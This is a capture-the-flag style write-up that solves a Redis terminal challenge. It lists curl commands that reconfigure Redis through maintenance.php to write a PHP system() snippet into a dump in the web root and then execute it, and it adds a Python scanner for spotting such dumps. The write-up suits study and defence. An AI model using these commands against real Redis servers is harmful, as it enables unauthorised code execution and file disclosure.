Redis Bug Hunt

Objective

Redis is an open source in-memory data store. In this terminal, Holly Evergreen needs some help finding the source code for the index page on the web server.

Tip

There are many sources on the Internet about pen-testing Redis. This one was helpful in completing the terminal: https://book.hacktricks.xyz/pentesting/6379-pentesting-redis.

Solution

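Redis contains functions for accessing the file system: the dir and dbfilename configuration settings decide where the database dump is written, and save writes it. The danger of allowing unauthenticated connections is that an attacker could read/write files on the server to run a command or even install a full-featured web shell.

The commands below, sent through maintenance.php, empty the database, point the dump file at /var/www/html/redis.php, store a short PHP snippet as the value of the key test, and save. Requesting redis.php then makes the web server execute the snippet embedded in the dump, which prints the source of index.php.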

$ curl http://localhost/maintenance.php?cmd=flushall
$ curl http://localhost/maintenance.php?cmd=config,set,dir,/var/www/html
$ curl http://localhost/maintenance.php?cmd=config,set,dbfilename,redis.php
$ curl http://localhost/maintenance.php?cmd=set,test,\<?php+system\(\'cat+/var/www/html/index.php\'\)\;?\>
$ curl http://localhost/maintenance.php?cmd=save

$ curl --output - http://localhost/redis.php
REDIS0009�      redis-ver5.0.3�
�edis-bits�@�ctime��k�_used-mem¸
 aof-preamble��� test.<?php
# We found the bug!!
#
#         \   /
#         .\-/.
#     /\ ()   ()
#       \/~---~\.-~^-.
# .-~^-./   |   \---.
#      {    |    }   \
#    .-~\   |   /~-.
#   /    \  A  /    \
#         \/ \/
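
For the defender's side, the artifact this leaves behind is easy to spot: a file in the web root that starts with the RDB magic (REDIS0009 in the output above). The scanner below is an added example, not part of the original write-up; the extension list, the script markers and the sample files built in demo() are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# RDB dumps start with the ASCII magic "REDIS" plus a 4-digit format version,
# e.g. "REDIS0009" in the output shown above.
RDB_MAGIC = re.compile(rb"REDIS\d{4}")
# Assumption: extensions the web server hands to an interpreter.
SCRIPT_EXTS = {".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx"}
# Assumption: byte sequences that open a server-side script block.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%")


def scan_webroot(root, max_read=1 << 20):
    """Return (relative path, reasons) for Redis dumps found under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(max_read)
            except OSError:
                continue  # unreadable file: skip it, keep scanning
            if not RDB_MAGIC.match(data):
                continue  # does not begin with the RDB header
            reasons = ["rdb-dump-in-webroot"]
            if os.path.splitext(name)[1].lower() in SCRIPT_EXTS:
                reasons.append("script-extension")
            if any(marker in data for marker in SCRIPT_MARKERS):
                reasons.append("embedded-script-tag")
            findings.append((os.path.relpath(path, root), reasons))
    return findings


def demo():
    """Build a constructed web root (sample data, not real dumps) and scan it."""
    samples = {
        "index.php": b"<?php echo 'hello'; ?>",  # ordinary page, no RDB header
        "redis.php": b"REDIS0009\xfa\tredis-ver\x055.0.3\x00\x04test\x10<?php /* x */ ?>\xff",
        "backup.rdb": b"REDIS0009\xfa\tredis-ver\x055.0.3\xff",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        return sorted(scan_webroot(root))


if __name__ == "__main__":
    for path, reasons in demo():
        print(path, ",".join(reasons))
```

Any hit is worth investigating, since Redis has no reason to write its dump under the directory the web server serves from.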